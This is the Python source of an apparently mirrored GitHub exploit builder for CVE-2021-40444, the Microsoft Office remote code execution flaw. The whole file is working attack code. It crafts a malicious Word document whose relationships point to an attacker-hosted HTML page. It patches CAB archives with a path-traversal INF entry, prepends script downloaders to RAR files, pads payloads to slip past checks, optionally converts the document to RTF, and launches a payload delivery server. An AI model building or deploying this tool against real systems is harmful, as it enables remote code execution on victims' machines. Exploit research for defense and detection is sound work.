mirror of
https://github.com/klezVirus/CVE-2021-40444.git
synced 2024-11-14 01:47:54 +00:00
476 lines
17 KiB
Python
476 lines
17 KiB
Python
#!/usr/bin/env python3
|
|
|
|
# Microsoft Office Remote Code Execution Exploit via Logical Bug
|
|
# Result is ability for attackers to execute arbitrary custom DLL's
|
|
# downloaded and executed on target system
|
|
import argparse
|
|
import base64
|
|
import binascii
|
|
import random
|
|
import re
|
|
import secrets
|
|
import shutil
|
|
import string
|
|
import struct
|
|
import sys
|
|
import os
|
|
import subprocess
|
|
import tempfile
|
|
import time
|
|
import traceback
|
|
from pathlib import Path
|
|
import win32com.client
|
|
|
|
from cab_parser import Cab
|
|
from in_place import InPlace
|
|
|
|
|
|
def patch_cab(path: Path, original_inf_path, patched_inf_path):
|
|
with InPlace(str(path.absolute()), mode="b") as out_cab:
|
|
cab = Cab(out_cab.read())
|
|
print(" [*] Setting setID to 1234")
|
|
cab.change_set_id(1234)
|
|
print(" [*] Setting CFFolder.coffCabStart to 80")
|
|
cab.change_coff_cab_start(80)
|
|
print(" [*] Setting CFFolder.CCFData to 2")
|
|
cab.change_ccfdata_count(2)
|
|
size = struct.unpack("<I", b"\x00\x22\x44\x00")[0]
|
|
print(f" [*] Setting CFFile.CbFile to {size}")
|
|
cab.change_cffile_cbfile(size)
|
|
print(" [*] Making INF file read only")
|
|
cab.make_file_read_only()
|
|
print(" [*] Zeroing out Checksum")
|
|
cab.zero_out_signature()
|
|
out_cab.write(cab.to_bytes())
|
|
|
|
with InPlace(str(path.absolute()), mode="b") as out_cab:
|
|
content = out_cab.read()
|
|
content = content.replace(original_inf_path, patched_inf_path)
|
|
print(f" [*] Patching path '{original_inf_path.decode()}' to '{patched_inf_path.decode()}'")
|
|
out_cab.write(content)
|
|
|
|
|
|
def make_ddf(ddf_file: Path, cab_file: Path, inf_file: Path):
|
|
# We need to generate a DDF file for makecab to work properly
|
|
# CabinetNameTemplate = Basename of the cab file
|
|
# DiskDirectoryTemplate = Directory where the cab file will be
|
|
with open(str(ddf_file.absolute()), "w") as ddf:
|
|
ddf.write(rf""".OPTION EXPLICIT
|
|
.Set CabinetNameTemplate={cab_file.name}
|
|
.set DiskDirectoryTemplate={cab_file.parent.name}
|
|
.Set CompressionType=MSZIP
|
|
.Set UniqueFiles=OFF
|
|
.Set Cabinet=ON
|
|
.Set Compress=OFF
|
|
.Set CabinetFileCountThreshold=0
|
|
.Set FolderFileCountThreshold=0
|
|
.Set FolderSizeThreshold=0
|
|
.Set MaxCabinetSize=0
|
|
.Set MaxDiskFileCount=0
|
|
.Set MaxDiskSize=0
|
|
"{inf_file.absolute()}"
|
|
""")
|
|
|
|
|
|
def execute_cmd(cmd, execute_from=None):
|
|
print(cmd)
|
|
try:
|
|
subprocess.check_output(
|
|
cmd,
|
|
shell=True,
|
|
cwd=execute_from
|
|
)
|
|
except subprocess.CalledProcessError as calledProcessError:
|
|
print(calledProcessError)
|
|
exit(1)
|
|
|
|
|
|
def patch_rar(rar_file, script: bytes):
|
|
# JS downloader string
|
|
downloader = bytearray(script)
|
|
# Appending null byte
|
|
# downloader.append(0)
|
|
content = bytearray(open(rar_file, "rb").read())
|
|
content = bytes(downloader + content)
|
|
with open(rar_file, "wb") as rar:
|
|
rar.write(content)
|
|
|
|
|
|
def rar(file: Path, rar_file, delete=False):
|
|
try:
|
|
output = subprocess.check_output(
|
|
f"bin\\rar.exe a -ep \"{rar_file}\" \"{str(file)}\"",
|
|
stderr=subprocess.STDOUT,
|
|
shell=True
|
|
)
|
|
if delete:
|
|
file.unlink(missing_ok=True)
|
|
except subprocess.CalledProcessError:
|
|
print("[-] Error generating RAR archive")
|
|
exit(1)
|
|
|
|
|
|
def make_rar(rar_file):
|
|
file_name = None
|
|
with tempfile.NamedTemporaryFile(
|
|
suffix=".txt",
|
|
delete=False,
|
|
mode="w"
|
|
) as txt_file:
|
|
txt_file.write("You've been pwnd!")
|
|
file_name = Path(txt_file.name).absolute()
|
|
|
|
rar(file_name, rar_file, delete=True)
|
|
|
|
|
|
def choose_template(templates: list):
|
|
try:
|
|
print("[*] Multiple compatible templates identified, choose one:")
|
|
choice = -1
|
|
for n, t in enumerate(templates, start=0):
|
|
print(f" {n}: {t}")
|
|
while not 0 <= choice <= len(templates) - 1:
|
|
try:
|
|
choice = int(input(" $> "))
|
|
except ValueError:
|
|
continue
|
|
return templates[choice]
|
|
except KeyboardInterrupt:
|
|
print("[-] Aborting")
|
|
sys.exit(1)
|
|
|
|
|
|
def append_garbage(content: str, exploit: str):
|
|
eol = '\n'
|
|
garbage = ""
|
|
filler = "A" * 80000
|
|
if exploit == ".vbs":
|
|
eol = '" _ \n & "'
|
|
garbage = rf"""
|
|
Dim Garbage
|
|
Garbage = "{eol.join([filler[i:i + 100] for i in range(0, len(filler), 100)])}";
|
|
"""
|
|
elif exploit == ".js":
|
|
garbage = f"var x = '';{eol}" + eol.join([f"x = '{filler[i:i + 100]}';" for i in range(0, len(filler), 100)])
|
|
elif exploit in [".wsf", ".hta"]:
|
|
garbage = f"<!--{eol}{filler}{eol}-->{eol}"
|
|
return content + garbage
|
|
|
|
|
|
def get_file_extension_based_uri(exploit, no_cab=False):
|
|
if exploit == ".dll":
|
|
return ".cpl"
|
|
elif exploit in [".hta", ".js", ".vbs", ".wsf", ".hta"] and no_cab:
|
|
return exploit
|
|
elif exploit in [".hta", ".js", ".vbs", ".wsf", ".hta"]:
|
|
return ".wsf"
|
|
else:
|
|
return "ms-msdt"
|
|
|
|
|
|
def get_mime_type(exploit):
|
|
if exploit == ".dll":
|
|
return "application/octet-stream"
|
|
elif exploit == ".hta":
|
|
return "application/hta"
|
|
elif exploit == ".js":
|
|
return "text/javascript"
|
|
elif exploit == ".vbs":
|
|
return "text/vbscript"
|
|
elif exploit == ".wsh":
|
|
return "text/plain"
|
|
elif exploit == ".wsf":
|
|
return "text/xml"
|
|
else:
|
|
return "text/plain"
|
|
|
|
|
|
def generate_payload(payload, server_url, basename, copy_to=None, no_cab=False, convert=False):
|
|
# Current Working Directory
|
|
working_directory = Path(__file__).parent
|
|
|
|
# Relevant directories for Execution
|
|
data_path = working_directory.joinpath("data")
|
|
word_dat_path = data_path.joinpath("word_dat")
|
|
srv_path = working_directory.joinpath("srv")
|
|
out_path = working_directory.joinpath("out")
|
|
cab_path = working_directory.joinpath("cab")
|
|
template_path = working_directory.joinpath("template")
|
|
|
|
# Relevant files
|
|
tmp_path = data_path.joinpath("tmp_doc")
|
|
word_dll = data_path.joinpath(f'{basename}.dll')
|
|
word_doc = out_path.joinpath('document.docx')
|
|
ddf = data_path.joinpath('mswordcab.ddf')
|
|
archive_file = out_path.joinpath(f"{basename}.cab")
|
|
rar_file = out_path.joinpath(f"{basename}.rar")
|
|
exploit_file = cab_path.joinpath(f"{basename}.inf")
|
|
|
|
exploit = os.path.splitext(args.payload)[1]
|
|
|
|
if no_cab and exploit not in [".wsf", ".ps1"]:
|
|
print("[-] CAB-less version chosen, only .wsf and .ps1 are currently working")
|
|
exit(1)
|
|
|
|
lolbin = exploit not in [".dll", ".ps1"]
|
|
|
|
if exploit == ".wsf" and no_cab:
|
|
id = "cabless-rar-"
|
|
elif exploit == ".ps1" and no_cab:
|
|
id = "cabless-msdt-"
|
|
elif lolbin and no_cab:
|
|
id = "cabless-smuggling-"
|
|
elif lolbin:
|
|
id = "cab-uri-"
|
|
else:
|
|
id = "cab-orig-"
|
|
|
|
script_file = None
|
|
templates = [
|
|
f for f in os.listdir(str(template_path))
|
|
if os.path.isfile(os.path.join(str(template_path), f))
|
|
and f.find(id) > -1
|
|
]
|
|
html_template_file = template_path.joinpath(choose_template(templates))
|
|
html_final_file = srv_path.joinpath(f"{basename}.html")
|
|
|
|
# Checking ephemeral directories
|
|
tmp_path.mkdir(exist_ok=True)
|
|
cab_path.mkdir(exist_ok=True)
|
|
srv_path.mkdir(exist_ok=True)
|
|
out_path.mkdir(exist_ok=True)
|
|
|
|
print(f' [>] Payload: {payload}')
|
|
print(f' [>] HTML/CAB/JS Hosting Server: {server_url}')
|
|
|
|
b64_payload = None
|
|
payload_content = None
|
|
try:
|
|
if exploit != ".dll" and no_cab:
|
|
payload_content = open(payload, 'r').read().strip().encode()
|
|
elif exploit != ".dll":
|
|
payload_content = "\x5a\x4d" + open(payload, 'r').read().strip()
|
|
payload_content = append_garbage(payload_content, exploit)
|
|
payload_content = payload_content.encode()
|
|
else:
|
|
payload_content = open(payload, 'rb').read()
|
|
with open(str(word_dll), 'wb') as filep:
|
|
filep.write(payload_content)
|
|
b64_payload = base64.b64encode(payload_content).decode()
|
|
except FileNotFoundError:
|
|
print('[-] Payload specified not found!')
|
|
exit(1)
|
|
except Exception as e:
|
|
print(f"[-] Exception: {e}")
|
|
exit(1)
|
|
|
|
if lolbin and no_cab:
|
|
tmp = Path(exploit_file.parent).joinpath(basename + get_file_extension_based_uri(exploit))
|
|
exploit_file.unlink(missing_ok=True)
|
|
exploit_file = Path(tmp)
|
|
with open(str(exploit_file), "w") as out:
|
|
out.write(payload_content.decode())
|
|
print(f"[*] Exposing script file {exploit_file.name} to the webserver for download")
|
|
shutil.copy(str(exploit_file), str(srv_path))
|
|
|
|
shutil.copytree(str(word_dat_path), str(tmp_path), dirs_exist_ok=True)
|
|
print('[*] Crafting Relationships to point to HTML/CAB/JS Hosting Server...')
|
|
with InPlace(str(tmp_path.joinpath("word").joinpath("_rels").joinpath('document.xml.rels'))) as rels:
|
|
xml_content = rels.read()
|
|
if exploit != ".ps1":
|
|
xml_content = xml_content.replace('<EXPLOIT_HOST_HERE>', f'{server_url}/{html_final_file.name}')
|
|
else:
|
|
xml_content = xml_content.replace('mhtml:<EXPLOIT_HOST_HERE>!x-usc:<EXPLOIT_HOST_HERE>', f'{server_url}/{html_final_file.name}!')
|
|
# xml_content = xml_content.replace('<INF_CHANGE_HERE>', inf_file.name)
|
|
rels.write(xml_content)
|
|
|
|
print('[*] Packing MS Word .docx file...')
|
|
word_doc.unlink(missing_ok=True)
|
|
shutil.make_archive(str(word_doc), 'zip', str(tmp_path))
|
|
shutil.move(str(word_doc) + ".zip", str(word_doc))
|
|
shutil.rmtree(str(tmp_path))
|
|
|
|
if not no_cab:
|
|
print('[*] Generating CAB file...')
|
|
make_ddf(ddf_file=ddf, cab_file=archive_file, inf_file=exploit_file)
|
|
shutil.move(word_dll, exploit_file)
|
|
|
|
execute_cmd(f'makecab /F "{ddf.absolute()}"', execute_from=str(working_directory))
|
|
patched_path = f'../{exploit_file.name}'.encode()
|
|
patch_cab(archive_file, str(exploit_file.name).encode(), patched_path)
|
|
shutil.copy(archive_file, srv_path)
|
|
shutil.copy(ddf, srv_path)
|
|
|
|
word_dll.unlink(missing_ok=True)
|
|
exploit_file.unlink(missing_ok=True)
|
|
ddf.unlink(missing_ok=True)
|
|
shutil.rmtree(str(cab_path.absolute()))
|
|
|
|
print('[*] Updating information on HTML exploit...')
|
|
shutil.copy(str(html_template_file), str(html_final_file))
|
|
|
|
print('[*] Copying MS Word .docx to Desktop for local testing...')
|
|
dest = Path(os.getenv("USERPROFILE")).joinpath("Desktop").joinpath(word_doc.name)
|
|
dest.unlink(missing_ok=True)
|
|
shutil.copy(str(word_doc.absolute()), dest)
|
|
|
|
if copy_to and os.path.isdir(copy_to) and not no_cab:
|
|
print(f'[*] Copying malicious cab to {copy_to} for analysis...')
|
|
dest = Path(copy_to).joinpath(archive_file.name)
|
|
dest.unlink(missing_ok=True)
|
|
shutil.copy(str(archive_file.absolute()), dest)
|
|
print(f' [>] CAB file stored at: {archive_file}')
|
|
|
|
with InPlace(str(html_final_file)) as p_exp:
|
|
content = p_exp.read()
|
|
content = content.replace('<HOST_CHANGE_HERE>', f"{server_url}/{archive_file.name}")
|
|
content = content.replace('<INF_CHANGE_HERE>', f"{exploit_file.name}")
|
|
content = content.replace('<RAR_CHANGE_HERE>', f"{rar_file.name}")
|
|
content = content.replace('<URI_SCHEME_HERE>', get_file_extension_based_uri(exploit))
|
|
content = content.replace('<BASE64_DATA_HERE>', b64_payload)
|
|
content = content.replace('<PAYLOAD_HERE>', payload_content.decode()) if exploit != ".dll" else ""
|
|
content = content.replace('<MIME_TYPE_HERE>', get_mime_type(exploit))
|
|
content = content.replace('<FIRST_LETTER>', get_file_extension_based_uri(exploit)[1])
|
|
content = content.replace('<SECOND_LETTER>', get_file_extension_based_uri(exploit)[2])
|
|
content = content.replace('<THIRD_LETTER>', get_file_extension_based_uri(exploit)[3])
|
|
p_exp.write(content)
|
|
|
|
print(f'[+] Success! MS Word Document stored at: {word_doc}')
|
|
|
|
if convert:
|
|
if convert_to_rtf(word_doc):
|
|
print(f'[+] Success! MS Word Document was converted to RTF!')
|
|
else:
|
|
print(f'[-] ERROR. MS Word Document could not be converted to RTF.')
|
|
|
|
if exploit == ".wsf" and no_cab:
|
|
print(f"[*] Generating RAR file {rar_file.name}... and pushing it to 'Downloads', to emulate user download")
|
|
rar_dest = Path(os.getenv("USERPROFILE")).joinpath("Downloads").joinpath(rar_file.name)
|
|
wsf_file = Path(os.getenv("USERPROFILE")).joinpath("Downloads").joinpath("test.wsf")
|
|
rar(word_doc, rar_dest, delete=False)
|
|
patch_rar(rar_file=rar_dest, script=payload_content)
|
|
shutil.copy(str(rar_dest), str(srv_path))
|
|
shutil.copy(str(rar_dest), str(wsf_file))
|
|
|
|
return html_final_file.name
|
|
|
|
|
|
def start_server(ip, port, directory: Path):
|
|
this = Path(__file__).parent.joinpath("util").joinpath("server.py")
|
|
subprocess.Popen(
|
|
f'start /D "{directory.absolute()}" "CVE-2021-40444 Payload Delivery Server" cmd /c python "{this.absolute()}" {ip} {port}',
|
|
shell=True,
|
|
close_fds=True,
|
|
stderr=subprocess.DEVNULL,
|
|
stdout=subprocess.DEVNULL,
|
|
creationflags=subprocess.DETACHED_PROCESS
|
|
)
|
|
|
|
|
|
def start_client(url):
|
|
subprocess.Popen(
|
|
f'"C:\\Program Files\\Internet Explorer\\iexplore.exe" "{url}"',
|
|
shell=True,
|
|
close_fds=True,
|
|
stderr=subprocess.DEVNULL,
|
|
stdout=subprocess.DEVNULL,
|
|
creationflags=subprocess.DETACHED_PROCESS
|
|
)
|
|
|
|
|
|
def clean():
|
|
pass
|
|
|
|
|
|
def convert_to_rtf(filename):
|
|
new_file = os.path.splitext(filename)[0] + ".rtf"
|
|
try:
|
|
word = win32com.client.Dispatch("Word.application")
|
|
word.Visible = False
|
|
wordDoc = word.Documents.Open(str(Path(filename).absolute()))
|
|
# wdFormatRTF = 6
|
|
wordDoc.SaveAs2(str(Path(new_file).absolute()), FileFormat=6)
|
|
wordDoc.Close()
|
|
return True
|
|
except:
|
|
traceback.print_exc()
|
|
return False
|
|
|
|
|
|
def validate_filename(filename):
|
|
# Required length for the file name
|
|
required_length = 12
|
|
if not filename:
|
|
filename = ""
|
|
current_length = len(filename)
|
|
if current_length > 12:
|
|
filename = filename[:12]
|
|
gap = required_length - current_length
|
|
return filename + ''.join(random.SystemRandom().choice(string.ascii_uppercase + string.digits) for _ in range(gap))
|
|
|
|
|
|
if __name__ == '__main__':
|
|
parser = argparse.ArgumentParser(description='[%] CVE-2021-40444 - MS Office Word RCE Exploit [%]')
|
|
parser.add_argument('-P', '--payload', type=str, required=True,
|
|
help="DLL payload to use for the exploit")
|
|
parser.add_argument('-u', '--url', type=str, default=None, required=True,
|
|
help="Server URL for malicious references (CAB->INF)")
|
|
parser.add_argument('-o', '--output', type=str, default=None, required=False,
|
|
help="Output files basename (no extension)")
|
|
parser.add_argument('--host', action='store_true', default=False, required=False,
|
|
help="If set, will host the payload after creation")
|
|
parser.add_argument('-c', '--copy-to', type=str, default=None, required=False,
|
|
help="Copy payload to an alternate path")
|
|
parser.add_argument('-nc', '--no-cab', action='store_true', default=False, required=False,
|
|
help="Use the CAB-less version of the exploit")
|
|
parser.add_argument('-t', '--test', action='store_true', default=False, required=False,
|
|
help="Open IExplorer to test the final HTML file")
|
|
parser.add_argument('-x', '--convert', action='store_true', default=False, required=False,
|
|
help="Convert DOCX into RTF format")
|
|
|
|
args = parser.parse_args()
|
|
|
|
filename = validate_filename(args.output)
|
|
|
|
print('[*] Generating a malicious payload...')
|
|
html = None
|
|
server = args.url
|
|
|
|
port = 80
|
|
ip = "127.0.0.1"
|
|
scheme = ""
|
|
try:
|
|
scheme, ip = server.split(":")[0], server.replace("//", "/").split("/")[1].split(":")[0]
|
|
if scheme == "http":
|
|
port = 80
|
|
elif scheme == "https":
|
|
port = 443
|
|
else:
|
|
raise NotImplemented(f"Scheme {scheme} is not supported")
|
|
if len(server.split(":")) > 2:
|
|
port = int(server.split(":")[2].split("/")[0])
|
|
except NotImplemented as e:
|
|
print(f"[-] {e}")
|
|
exit(1)
|
|
except (ValueError, KeyError, IndexError):
|
|
print("[-] Wrong URL format")
|
|
exit(1)
|
|
|
|
try:
|
|
html = generate_payload(payload=args.payload, server_url=server, basename=filename, copy_to=args.copy_to,
|
|
no_cab=args.no_cab, convert=args.convert)
|
|
except (SystemExit, KeyboardInterrupt):
|
|
exit(1)
|
|
except:
|
|
traceback.print_exc()
|
|
exit(1)
|
|
if args.host and html:
|
|
print(f'[*] Hosting HTML Exploit at {scheme}://{ip}:{port}/{html}...')
|
|
start_server(ip=ip, port=port, directory=Path(__file__).parent.joinpath("srv"))
|
|
if args.test:
|
|
if os.path.splitext(args.payload)[1] != ".wsf":
|
|
print(f"[-] IE testing might not compatible with {os.path.splitext(args.payload)[1]}")
|
|
print(f'[*] Opening IE at {args.url}/{html}...')
|
|
time.sleep(3)
|
|
start_client(f"{args.url}/{html}")
|